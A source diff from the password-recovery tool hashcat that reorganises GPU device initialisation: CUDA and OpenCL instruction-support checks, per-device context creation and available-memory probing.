       //const int rc_cuCtxSetCacheConfig = hc_cuCtxSetCacheConfig (hashcat_ctx, CU_FUNC_CACHE_PREFER_SHARED);
@@ -5638,46 +5648,13 @@ int backend_ctx_devices_init (hashcat_ctx_t *hashcat_ctx, const int comptime)
       device_param->has_mov64 = (sm >= 10) ? true : false;
       device_param->has_prmt  = (sm >= 20) ? true : false;
 
-      /*
-      #define RUN_INSTRUCTION_CHECKS()                                                                                                                                                                                                                      \
-        device_param->has_add   = cuda_test_instruction (hashcat_ctx, sm_major, sm_minor, "__global__ void test () { unsigned int r; asm volatile (\"add.cc.u32 %0, 0, 0;\" : \"=r\"(r)); }");                                                              \
-        device_param->has_addc  = cuda_test_instruction (hashcat_ctx, sm_major, sm_minor, "__global__ void test () { unsigned int r; asm volatile (\"addc.cc.u32 %0, 0, 0;\" : \"=r\"(r)); }");                                                             \
-        device_param->has_sub   = cuda_test_instruction (hashcat_ctx, sm_major, sm_minor, "__global__ void test () { unsigned int r; asm volatile (\"sub.cc.u32 %0, 0, 0;\" : \"=r\"(r)); }");                                                              \
-        device_param->has_subc  = cuda_test_instruction (hashcat_ctx, sm_major, sm_minor, "__global__ void test () { unsigned int r; asm volatile (\"subc.cc.u32 %0, 0, 0;\" : \"=r\"(r)); }");                                                             \
-        device_param->has_bfe   = cuda_test_instruction (hashcat_ctx, sm_major, sm_minor, "__global__ void test () { unsigned int r; asm volatile (\"bfe.u32 %0, 0, 0, 0;\" : \"=r\"(r)); }");                                                              \
-        device_param->has_lop3  = cuda_test_instruction (hashcat_ctx, sm_major, sm_minor, "__global__ void test () { unsigned int r; asm volatile (\"lop3.b32 %0, 0, 0, 0, 0;\" : \"=r\"(r)); }");                                                          \
-        device_param->has_mov64 = cuda_test_instruction (hashcat_ctx, sm_major, sm_minor, "__global__ void test () { unsigned long long r; unsigned int a; unsigned int b; asm volatile (\"mov.b64 %0, {%1, %2};\" : \"=l\"(r) : \"r\"(a), \"r\"(b)); }");  \
-        device_param->has_prmt  = cuda_test_instruction (hashcat_ctx, sm_major, sm_minor, "__global__ void test () { unsigned int r; asm volatile (\"prmt.b32 %0, 0, 0, 0;\" : \"=r\"(r)); }");                                                             \
-
-      if (backend_devices_idx > 0)
-      {
-        hc_device_param_t *device_param_prev = &devices_param[backend_devices_idx - 1];
-
-        if (is_same_device_type (device_param, device_param_prev) == true)
-        {
-          device_param->has_add   = device_param_prev->has_add;
-          device_param->has_addc  = device_param_prev->has_addc;
-          device_param->has_sub   = device_param_prev->has_sub;
-          device_param->has_subc  = device_param_prev->has_subc;
-          device_param->has_bfe   = device_param_prev->has_bfe;
-          device_param->has_lop3  = device_param_prev->has_lop3;
-          device_param->has_mov64 = device_param_prev->has_mov64;
-          device_param->has_prmt  = device_param_prev->has_prmt;
-        }
-        else
-        {
-          RUN_INSTRUCTION_CHECKS();
-        }
-      }
-      else
-      {
-        RUN_INSTRUCTION_CHECKS();
-      }
+      // device_available_mem
 
-      #undef RUN_INSTRUCTION_CHECKS
-      */
+      CUcontext cuda_context;
 
-      // device_available_mem
+      if (hc_cuCtxCreate (hashcat_ctx, &cuda_context, CU_CTX_SCHED_BLOCKING_SYNC, device_param->cuda_device) == -1) return -1;
+
+      if (hc_cuCtxSetCurrent (hashcat_ctx, cuda_context) == -1) return -1;
 
       size_t free  = 0;
       size_t total = 0;
@@ -6269,6 +6246,25 @@ int backend_ctx_devices_init (hashcat_ctx_t *hashcat_ctx, const int comptime)
           }
         }
 
+        // instruction set
+
+        // fixed values work only for NVIDIA devices;
+        // for AMD the values are detected dynamically, see the time-intensive section below
+
+        if ((device_param->opencl_device_type & CL_DEVICE_TYPE_GPU) && (device_param->opencl_platform_vendor_id == VENDOR_ID_NV))
+        {
+          const int sm = (device_param->sm_major * 10) + device_param->sm_minor;
+
+          device_param->has_add   = (sm >= 12) ? true : false;
+          device_param->has_addc  = (sm >= 12) ? true : false;
+          device_param->has_sub   = (sm >= 12) ? true : false;
+          device_param->has_subc  = (sm >= 12) ? true : false;
+          device_param->has_bfe   = (sm >= 20) ? true : false;
+          device_param->has_lop3  = (sm >= 50) ? true : false;
+          device_param->has_mov64 = (sm >= 10) ? true : false;
+          device_param->has_prmt  = (sm >= 20) ? true : false;
+        }
+
         // common driver check
 
         if (device_param->skipped == false)
@@ -6432,272 +6428,336 @@ int backend_ctx_devices_init (hashcat_ctx_t *hashcat_ctx, const int comptime)
 
           opencl_devices_active++;
         }
+      }
+    }
+  }
 
-        /**
-         * create context for each device
-         */
+  backend_ctx->opencl_devices_cnt     = opencl_devices_cnt;
+  backend_ctx->opencl_devices_active  = opencl_devices_active;
 
-        cl_context context;
+  // all devices combined go into backend_* variables
 
-        /*
-        cl_context_properties properties[3];
+  backend_ctx->backend_devices_cnt    = cuda_devices_cnt    + opencl_devices_cnt;
+  backend_ctx->backend_devices_active = cuda_devices_active + opencl_devices_active;
 
-        properties[0] = CL_CONTEXT_PLATFORM;
-        properties[1] = (cl_context_properties) device_param->opencl_platform;
-        properties[2] = 0;
+  // find duplicate devices
 
-        CL_rc = hc_clCreateContext (hashcat_ctx, properties, 1, &device_param->opencl_device, NULL, NULL, &context);
-        */
+  //if ((cuda_devices_cnt > 0) && (opencl_devices_cnt > 0))
+  //{
+    // using force here enables both devices, which is the worst possible outcome
+    // many users force by default, so this is not a good idea
 
-        if (hc_clCreateContext (hashcat_ctx, NULL, 1, &device_param->opencl_device, NULL, NULL, &context) == -1) return -1;
+    //if (user_options->force == false)
+    //{
+    backend_ctx_find_alias_devices (hashcat_ctx);
+    //{
+  //}
 
-        /**
-         * create command-queue
-         */
+  if (backend_ctx->backend_devices_active == 0)
+  {
+    event_log_error (hashcat_ctx, "No devices found/left.");
 
-        cl_command_queue command_queue;
+    return -1;
+  }
 
-        if (hc_clCreateCommandQueue (hashcat_ctx, context, device_param->opencl_device, 0, &command_queue) == -1) return -1;
+  // now we can calculate the number of parallel running hook threads based on
+  // the number of CPU cores and the number of active compute devices
+  // unless overridden by the user
 
-        if ((device_param->opencl_device_type & CL_DEVICE_TYPE_GPU) && (device_param->opencl_platform_vendor_id == VENDOR_ID_AMD))
-        {
-          #define RUN_INSTRUCTION_CHECKS()
-            device_param->has_vadd     = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_ADD_U32     %0, vcc, 0, 0;\"      : \"=v\"(r1)); }"); \
-            device_param->has_vaddc    = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_ADDC_U32    %0, vcc, 0, 0, vcc;\" : \"=v\"(r1)); }"); \
-            device_param->has_vadd_co  = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_ADD_CO_U32  %0, vcc, 0, 0;\"      : \"=v\"(r1)); }"); \
-            device_param->has_vaddc_co = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_ADDC_CO_U32 %0, vcc, 0, 0, vcc;\" : \"=v\"(r1)); }"); \
-            device_param->has_vsub     = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_SUB_U32     %0, vcc, 0, 0;\"      : \"=v\"(r1)); }"); \
-            device_param->has_vsubb    = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_SUBB_U32    %0, vcc, 0, 0, vcc;\" : \"=v\"(r1)); }"); \
-            device_param->has_vsub_co  = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_SUB_CO_U32  %0, vcc, 0, 0;\"      : \"=v\"(r1)); }"); \
-            device_param->has_vsubb_co = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_SUBB_CO_U32 %0, vcc, 0, 0, vcc;\" : \"=v\"(r1)); }"); \
-            device_param->has_vadd3    = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_ADD3_U32    %0,   0, 0, 0;\"      : \"=v\"(r1)); }"); \
-            device_param->has_vbfe     = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_BFE_U32     %0,   0, 0, 0;\"      : \"=v\"(r1)); }"); \
-            device_param->has_vperm    = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_PERM_B32    %0,   0, 0, 0;\"      : \"=v\"(r1)); }"); \
+  if (user_options->hook_threads == HOOK_THREADS)
+  {
+    const u32 processor_count = hc_get_processor_count ();
 
-          if (backend_devices_idx > 0)
-          {
-            hc_device_param_t *device_param_prev = &devices_param[backend_devices_idx - 1];
+    const u32 processor_count_cu = CEILDIV (processor_count, backend_ctx->backend_devices_active); // should never reach 0
 
-            if (is_same_device_type (device_param, device_param_prev) == true)
-            {
-              device_param->has_vadd     = device_param_prev->has_vadd;
-              device_param->has_vaddc    = device_param_prev->has_vaddc;
-              device_param->has_vadd_co  = device_param_prev->has_vadd_co;
-              device_param->has_vaddc_co = device_param_prev->has_vaddc_co;
-              device_param->has_vsub     = device_param_prev->has_vsub;
-              device_param->has_vsubb    = device_param_prev->has_vsubb;
-              device_param->has_vsub_co  = device_param_prev->has_vsub_co;
-              device_param->has_vsubb_co = device_param_prev->has_vsubb_co;
-              device_param->has_vadd3    = device_param_prev->has_vadd3;
-              device_param->has_vbfe     = device_param_prev->has_vbfe;
-              device_param->has_vperm    = device_param_prev->has_vperm;
-            }
-            else
-            {
-              RUN_INSTRUCTION_CHECKS();
-            }
-          }
-          else
-          {
-            RUN_INSTRUCTION_CHECKS();
-          }
+    user_options->hook_threads = processor_count_cu;
+  }
 
-          #undef RUN_INSTRUCTION_CHECKS
-        }
+  // additional check to see if the user has chosen a device that is not within the range of available devices (i.e. larger than devices_cnt)
 
-        if ((device_param->opencl_device_type & CL_DEVICE_TYPE_GPU) && (device_param->opencl_platform_vendor_id == VENDOR_ID_NV))
-        {
-          const int sm = (device_param->sm_major * 10) + device_param->sm_minor;
+  if (backend_ctx->backend_devices_filter != (u64) -1)
+  {
+    const u64 backend_devices_cnt_mask = ~(((u64) -1 >> backend_ctx->backend_devices_cnt) << backend_ctx->backend_devices_cnt);
 
-          device_param->has_add   = (sm >= 12) ? true : false;
-          device_param->has_addc  = (sm >= 12) ? true : false;
-          device_param->has_sub   = (sm >= 12) ? true : false;
-          device_param->has_subc  = (sm >= 12) ? true : false;
-          device_param->has_bfe   = (sm >= 20) ? true : false;
-          device_param->has_lop3  = (sm >= 50) ? true : false;
-          device_param->has_mov64 = (sm >= 10) ? true : false;
-          device_param->has_prmt  = (sm >= 20) ? true : false;
+    if (backend_ctx->backend_devices_filter > backend_devices_cnt_mask)
+    {
+      event_log_error (hashcat_ctx, "An invalid device was specified using the --backend-devices parameter.");
+      event_log_error (hashcat_ctx, "The specified device was higher than the number of available devices (%u).", backend_ctx->backend_devices_cnt);
 
-          /*
-          #define RUN_INSTRUCTION_CHECKS()                                                                                                                                                                                                          \
-            device_param->has_add   = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r; asm volatile (\"add.cc.u32 %0, 0, 0;\" : \"=r\"(r)); }");                                        \
-            device_param->has_addc  = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r; asm volatile (\"addc.cc.u32 %0, 0, 0;\" : \"=r\"(r)); }");                                       \
-            device_param->has_sub   = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r; asm volatile (\"sub.cc.u32 %0, 0, 0;\" : \"=r\"(r)); }");                                        \
-            device_param->has_subc  = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r; asm volatile (\"subc.cc.u32 %0, 0, 0;\" : \"=r\"(r)); }");                                       \
-            device_param->has_bfe   = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r; asm volatile (\"bfe.u32 %0, 0, 0, 0;\" : \"=r\"(r)); }");                                        \
-            device_param->has_lop3  = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r; asm volatile (\"lop3.b32 %0, 0, 0, 0, 0;\" : \"=r\"(r)); }");                                    \
-            device_param->has_mov64 = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { ulong r; uint a; uint b; asm volatile (\"mov.b64 %0, {%1, %2};\" : \"=l\"(r) : \"r\"(a), \"r\"(b)); }"); \
-            device_param->has_prmt  = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r; asm volatile (\"prmt.b32 %0, 0, 0, 0;\" : \"=r\"(r)); }");                                       \
-
-          if (backend_devices_idx > 0)
-          {
-            hc_device_param_t *device_param_prev = &devices_param[backend_devices_idx - 1];
+      return -1;
+    }
+  }
 
-            if (is_same_device_type (device_param, device_param_prev) == true)
-            {
-              device_param->has_add   = device_param_prev->has_add;
-              device_param->has_addc  = device_param_prev->has_addc;
-              device_param->has_sub   = device_param_prev->has_sub;
-              device_param->has_subc  = device_param_prev->has_subc;
-              device_param->has_bfe   = device_param_prev->has_bfe;
-              device_param->has_lop3  = device_param_prev->has_lop3;
-              device_param->has_mov64 = device_param_prev->has_mov64;
-              device_param->has_prmt  = device_param_prev->has_prmt;
-            }
-            else
-            {
-              RUN_INSTRUCTION_CHECKS();
-            }
-          }
-          else
-          {
-            RUN_INSTRUCTION_CHECKS();
-          }
+  // time or resource intensive operations which we do not run if the corresponding device was skipped by the user
 
-          #undef RUN_INSTRUCTION_CHECKS
-          */
-        }
+  if (backend_ctx->cuda)
+  {
+    // instruction test for cuda devices was replaced with fixed values (see above)
 
-        // device_available_mem
+    /*
+    CUcontext cuda_context;
 
-        #define MAX_ALLOC_CHECKS_CNT  8192
-        #define MAX_ALLOC_CHECKS_SIZE (64 * 1024 * 1024)
+    if (hc_cuCtxCreate (hashcat_ctx, &cuda_context, CU_CTX_SCHED_BLOCKING_SYNC, device_param->cuda_device) == -1) return -1;
 
-        device_param->device_available_mem = device_param->device_global_mem - MAX_ALLOC_CHECKS_SIZE;
+    if (hc_cuCtxSetCurrent (hashcat_ctx, cuda_context) == -1) return -1;
 
-        #if defined (_WIN)
-        if ((device_param->opencl_device_type & CL_DEVICE_TYPE_GPU) && (device_param->opencl_platform_vendor_id == VENDOR_ID_NV))
-        #else
-        if ((device_param->opencl_device_type & CL_DEVICE_TYPE_GPU) && ((device_param->opencl_platform_vendor_id == VENDOR_ID_NV) || (device_param->opencl_platform_vendor_id == VENDOR_ID_AMD)))
-        #endif
-        {
-          // OK, so the problem here is the following:
-          // There's just CL_DEVICE_GLOBAL_MEM_SIZE to ask OpenCL about the total memory on the device,
-          // but there's no way to ask for available memory on the device.
-          // In combination, most OpenCL runtimes implementation of clCreateBuffer()
-          // are doing so called lazy memory allocation on the device.
-          // Now, if the user has X11 (or a game or anything that takes a lot of GPU memory)
-          // running on the host we end up with an error type of this:
-          // clEnqueueNDRangeKernel(): CL_MEM_OBJECT_ALLOCATION_FAILURE
-          // The clEnqueueNDRangeKernel() is because of the lazy allocation
-          // The best way to workaround this problem is if we would be able to ask for available memory,
-          // The idea here is to try to evaluate available memory by allocating it till it errors
+    #define RUN_INSTRUCTION_CHECKS()                                                                                                                                                                                                                      \
+      device_param->has_add   = cuda_test_instruction (hashcat_ctx, sm_major, sm_minor, "__global__ void test () { unsigned int r; asm volatile (\"add.cc.u32 %0, 0, 0;\" : \"=r\"(r)); }");                                                              \
+      device_param->has_addc  = cuda_test_instruction (hashcat_ctx, sm_major, sm_minor, "__global__ void test () { unsigned int r; asm volatile (\"addc.cc.u32 %0, 0, 0;\" : \"=r\"(r)); }");                                                             \
+      device_param->has_sub   = cuda_test_instruction (hashcat_ctx, sm_major, sm_minor, "__global__ void test () { unsigned int r; asm volatile (\"sub.cc.u32 %0, 0, 0;\" : \"=r\"(r)); }");                                                              \
+      device_param->has_subc  = cuda_test_instruction (hashcat_ctx, sm_major, sm_minor, "__global__ void test () { unsigned int r; asm volatile (\"subc.cc.u32 %0, 0, 0;\" : \"=r\"(r)); }");                                                             \
+      device_param->has_bfe   = cuda_test_instruction (hashcat_ctx, sm_major, sm_minor, "__global__ void test () { unsigned int r; asm volatile (\"bfe.u32 %0, 0, 0, 0;\" : \"=r\"(r)); }");                                                              \
+      device_param->has_lop3  = cuda_test_instruction (hashcat_ctx, sm_major, sm_minor, "__global__ void test () { unsigned int r; asm volatile (\"lop3.b32 %0, 0, 0, 0, 0;\" : \"=r\"(r)); }");                                                          \
+      device_param->has_mov64 = cuda_test_instruction (hashcat_ctx, sm_major, sm_minor, "__global__ void test () { unsigned long long r; unsigned int a; unsigned int b; asm volatile (\"mov.b64 %0, {%1, %2};\" : \"=l\"(r) : \"r\"(a), \"r\"(b)); }");  \
+      device_param->has_prmt  = cuda_test_instruction (hashcat_ctx, sm_major, sm_minor, "__global__ void test () { unsigned int r; asm volatile (\"prmt.b32 %0, 0, 0, 0;\" : \"=r\"(r)); }");                                                             \
 
-          cl_mem *tmp_device = (cl_mem *) hccalloc (MAX_ALLOC_CHECKS_CNT, sizeof (cl_mem));
+    if (backend_devices_idx > 0)
+    {
+      hc_device_param_t *device_param_prev = &devices_param[backend_devices_idx - 1];
 
-          u64 c;
+      if (is_same_device_type (device_param, device_param_prev) == true)
+      {
+        device_param->has_add   = device_param_prev->has_add;
+        device_param->has_addc  = device_param_prev->has_addc;
+        device_param->has_sub   = device_param_prev->has_sub;
+        device_param->has_subc  = device_param_prev->has_subc;
+        device_param->has_bfe   = device_param_prev->has_bfe;
+        device_param->has_lop3  = device_param_prev->has_lop3;
+        device_param->has_mov64 = device_param_prev->has_mov64;
+        device_param->has_prmt  = device_param_prev->has_prmt;
+      }
+      else
+      {
+        RUN_INSTRUCTION_CHECKS();
+      }
+    }
+    else
+    {
+      RUN_INSTRUCTION_CHECKS();
+    }
 
-          for (c = 0; c < MAX_ALLOC_CHECKS_CNT; c++)
-          {
-            if (((c + 1 + 1) * MAX_ALLOC_CHECKS_SIZE) >= device_param->device_global_mem) break;
+    #undef RUN_INSTRUCTION_CHECKS
 
-            cl_int CL_err;
+    if (hc_cuCtxDestroy (hashcat_ctx, cuda_context) == -1) return -1;
 
-            OCL_PTR *ocl = (OCL_PTR *) backend_ctx->ocl;
+    */
+  }
 
-            tmp_device[c] = ocl->clCreateBuffer (context, CL_MEM_READ_WRITE, MAX_ALLOC_CHECKS_SIZE, NULL, &CL_err);
+  if (backend_ctx->ocl)
+  {
+    for (int backend_devices_cnt = 0; backend_devices_cnt < backend_ctx->backend_devices_cnt; backend_devices_cnt++)
+    {
+      hc_device_param_t *device_param = &backend_ctx->devices_param[backend_devices_cnt];
 
-            if (CL_err != CL_SUCCESS)
-            {
-              c--;
+      if (device_param->is_opencl == false) continue;
 
-              break;
-            }
+      if (device_param->skipped == true) continue;
 
-            // transfer only a few byte should be enough to force the runtime to actually allocate the memory
+      /**
+       * create context for each device
+       */
 
-            u8 tmp_host[8];
+      cl_context context;
 
-            if (ocl->clEnqueueReadBuffer  (command_queue, tmp_device[c], CL_TRUE, 0, sizeof (tmp_host), tmp_host, 0, NULL, NULL) != CL_SUCCESS) break;
+      /*
+      cl_context_properties properties[3];
 
-            if (ocl->clEnqueueWriteBuffer (command_queue, tmp_device[c], CL_TRUE, 0, sizeof (tmp_host), tmp_host, 0, NULL, NULL) != CL_SUCCESS) break;
+      properties[0] = CL_CONTEXT_PLATFORM;
+      properties[1] = (cl_context_properties) device_param->opencl_platform;
+      properties[2] = 0;
 
-            if (ocl->clEnqueueReadBuffer  (command_queue, tmp_device[c], CL_TRUE, MAX_ALLOC_CHECKS_SIZE - sizeof (tmp_host), sizeof (tmp_host), tmp_host, 0, NULL, NULL) != CL_SUCCESS) break;
+      CL_rc = hc_clCreateContext (hashcat_ctx, properties, 1, &device_param->opencl_device, NULL, NULL, &context);
+      */
 
-            if (ocl->clEnqueueWriteBuffer (command_queue, tmp_device[c], CL_TRUE, MAX_ALLOC_CHECKS_SIZE - sizeof (tmp_host), sizeof (tmp_host), tmp_host, 0, NULL, NULL) != CL_SUCCESS) break;
-          }
+      if (hc_clCreateContext (hashcat_ctx, NULL, 1, &device_param->opencl_device, NULL, NULL, &context) == -1) return -1;
+
+      /**
+       * create command-queue
+       */
 
-          device_param->device_available_mem = MAX_ALLOC_CHECKS_SIZE;
-          if (c > 0)
+      cl_command_queue command_queue;
+
+      if (hc_clCreateCommandQueue (hashcat_ctx, context, device_param->opencl_device, 0, &command_queue) == -1) return -1;
+
+      // instruction set
+
+      if ((device_param->opencl_device_type & CL_DEVICE_TYPE_GPU) && (device_param->opencl_platform_vendor_id == VENDOR_ID_AMD))
+      {
+        #define RUN_INSTRUCTION_CHECKS()
+          device_param->has_vadd     = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_ADD_U32     %0, vcc, 0, 0;\"      : \"=v\"(r1)); }"); \
+          device_param->has_vaddc    = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_ADDC_U32    %0, vcc, 0, 0, vcc;\" : \"=v\"(r1)); }"); \
+          device_param->has_vadd_co  = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_ADD_CO_U32  %0, vcc, 0, 0;\"      : \"=v\"(r1)); }"); \
+          device_param->has_vaddc_co = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_ADDC_CO_U32 %0, vcc, 0, 0, vcc;\" : \"=v\"(r1)); }"); \
+          device_param->has_vsub     = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_SUB_U32     %0, vcc, 0, 0;\"      : \"=v\"(r1)); }"); \
+          device_param->has_vsubb    = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_SUBB_U32    %0, vcc, 0, 0, vcc;\" : \"=v\"(r1)); }"); \
+          device_param->has_vsub_co  = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_SUB_CO_U32  %0, vcc, 0, 0;\"      : \"=v\"(r1)); }"); \
+          device_param->has_vsubb_co = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_SUBB_CO_U32 %0, vcc, 0, 0, vcc;\" : \"=v\"(r1)); }"); \
+          device_param->has_vadd3    = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_ADD3_U32    %0,   0, 0, 0;\"      : \"=v\"(r1)); }"); \
+          device_param->has_vbfe     = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_BFE_U32     %0,   0, 0, 0;\"      : \"=v\"(r1)); }"); \
+          device_param->has_vperm    = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_PERM_B32    %0,   0, 0, 0;\"      : \"=v\"(r1)); }"); \
+
+        if (backend_devices_idx > 0)
+        {
+          hc_device_param_t *device_param_prev = &devices_param[backend_devices_idx - 1];
+
+          if (is_same_device_type (device_param, device_param_prev) == true)
           {
-            device_param->device_available_mem *= c;
+            device_param->has_vadd     = device_param_prev->has_vadd;
+            device_param->has_vaddc    = device_param_prev->has_vaddc;
+            device_param->has_vadd_co  = device_param_prev->has_vadd_co;
+            device_param->has_vaddc_co = device_param_prev->has_vaddc_co;
+            device_param->has_vsub     = device_param_prev->has_vsub;
+            device_param->has_vsubb    = device_param_prev->has_vsubb;
+            device_param->has_vsub_co  = device_param_prev->has_vsub_co;
+            device_param->has_vsubb_co = device_param_prev->has_vsubb_co;
+            device_param->has_vadd3    = device_param_prev->has_vadd3;
+            device_param->has_vbfe     = device_param_prev->has_vbfe;
+            device_param->has_vperm    = device_param_prev->has_vperm;
           }
+          else
+          {
+            RUN_INSTRUCTION_CHECKS();
+          }
+        }
+        else
+        {
+          RUN_INSTRUCTION_CHECKS();
+        }
+
+        #undef RUN_INSTRUCTION_CHECKS
+      }
 
-          // clean up
+      if ((device_param->opencl_device_type & CL_DEVICE_TYPE_GPU) && (device_param->opencl_platform_vendor_id == VENDOR_ID_NV))
+      {
+        // replaced with fixed values; see the non-time-intensive section above
 
-          for (c = 0; c < MAX_ALLOC_CHECKS_CNT; c++)
-          {
-            if (((c + 1 + 1) * MAX_ALLOC_CHECKS_SIZE) >= device_param->device_global_mem) break;
+        /*
+        #define RUN_INSTRUCTION_CHECKS()                                                                                                                                                                                                          \
+          device_param->has_add   = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r; asm volatile (\"add.cc.u32 %0, 0, 0;\" : \"=r\"(r)); }");                                        \
+          device_param->has_addc  = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r; asm volatile (\"addc.cc.u32 %0, 0, 0;\" : \"=r\"(r)); }");                                       \
+          device_param->has_sub   = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r; asm volatile (\"sub.cc.u32 %0, 0, 0;\" : \"=r\"(r)); }");                                        \
+          device_param->has_subc  = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r; asm volatile (\"subc.cc.u32 %0, 0, 0;\" : \"=r\"(r)); }");                                       \
+          device_param->has_bfe   = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r; asm volatile (\"bfe.u32 %0, 0, 0, 0;\" : \"=r\"(r)); }");                                        \
+          device_param->has_lop3  = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r; asm volatile (\"lop3.b32 %0, 0, 0, 0, 0;\" : \"=r\"(r)); }");                                    \
+          device_param->has_mov64 = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { ulong r; uint a; uint b; asm volatile (\"mov.b64 %0, {%1, %2};\" : \"=l\"(r) : \"r\"(a), \"r\"(b)); }"); \
+          device_param->has_prmt  = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r; asm volatile (\"prmt.b32 %0, 0, 0, 0;\" : \"=r\"(r)); }");                                       \
 
-            if (tmp_device[c] != NULL)
-            {
-              if (hc_clReleaseMemObject (hashcat_ctx, tmp_device[c]) == -1) return -1;
-            }
-          }
+        if (backend_devices_idx > 0)
+        {
+          hc_device_param_t *device_param_prev = &devices_param[backend_devices_idx - 1];
 
-          hcfree (tmp_device);
+          if (is_same_device_type (device_param, device_param_prev) == true)
+          {
+            device_param->has_add   = device_param_prev->has_add;
+            device_param->has_addc  = device_param_prev->has_addc;
+            device_param->has_sub   = device_param_prev->has_sub;
+            device_param->has_subc  = device_param_prev->has_subc;
+            device_param->has_bfe   = device_param_prev->has_bfe;
+            device_param->has_lop3  = device_param_prev->has_lop3;
+            device_param->has_mov64 = device_param_prev->has_mov64;
+            device_param->has_prmt  = device_param_prev->has_prmt;
+          }
+          else
+          {
+            RUN_INSTRUCTION_CHECKS();
+          }
+        }
+        else
+        {
+          RUN_INSTRUCTION_CHECKS();
         }
 
-        hc_clReleaseCommandQueue (hashcat_ctx, command_queue);
-
-        hc_clReleaseContext (hashcat_ctx, context);
+        #undef RUN_INSTRUCTION_CHECKS
+        */
       }
-    }
-  }
 
-  backend_ctx->opencl_devices_cnt     = opencl_devices_cnt;
-  backend_ctx->opencl_devices_active  = opencl_devices_active;
+      // available device memory
+      // This test causes a GPU memory usage spike.
+      // If multiple hashcat instances start at the same time, this will cause GPU out-of-memory errors which otherwise would not exist.
+      // We will simply not run it if that device was skipped by the user.
 
-  // all devices combined go into backend_* variables
+      #define MAX_ALLOC_CHECKS_CNT  8192
+      #define MAX_ALLOC_CHECKS_SIZE (64 * 1024 * 1024)
 
-  backend_ctx->backend_devices_cnt    = cuda_devices_cnt    + opencl_devices_cnt;
-  backend_ctx->backend_devices_active = cuda_devices_active + opencl_devices_active;
+      device_param->device_available_mem = device_param->device_global_mem - MAX_ALLOC_CHECKS_SIZE;
 
-  // find duplicate devices
+      #if defined (_WIN)
+      if ((device_param->opencl_device_type & CL_DEVICE_TYPE_GPU) && (device_param->opencl_platform_vendor_id == VENDOR_ID_NV))
+      #else
+      if ((device_param->opencl_device_type & CL_DEVICE_TYPE_GPU) && ((device_param->opencl_platform_vendor_id == VENDOR_ID_NV) || (device_param->opencl_platform_vendor_id == VENDOR_ID_AMD)))
+      #endif
+      {
+        // OK, so the problem here is the following:
+        // There's just CL_DEVICE_GLOBAL_MEM_SIZE to ask OpenCL about the total memory on the device,
+        // but there's no way to ask for available memory on the device.
+        // In combination, most OpenCL runtimes' implementations of clCreateBuffer()
+        // perform so-called lazy memory allocation on the device.
+        // Now, if the user has X11 (or a game or anything that takes a lot of GPU memory)
+        // running on the host, we end up with an error like this:
+        // clEnqueueNDRangeKernel(): CL_MEM_OBJECT_ALLOCATION_FAILURE
+        // The error surfaces in clEnqueueNDRangeKernel() because of the lazy allocation.
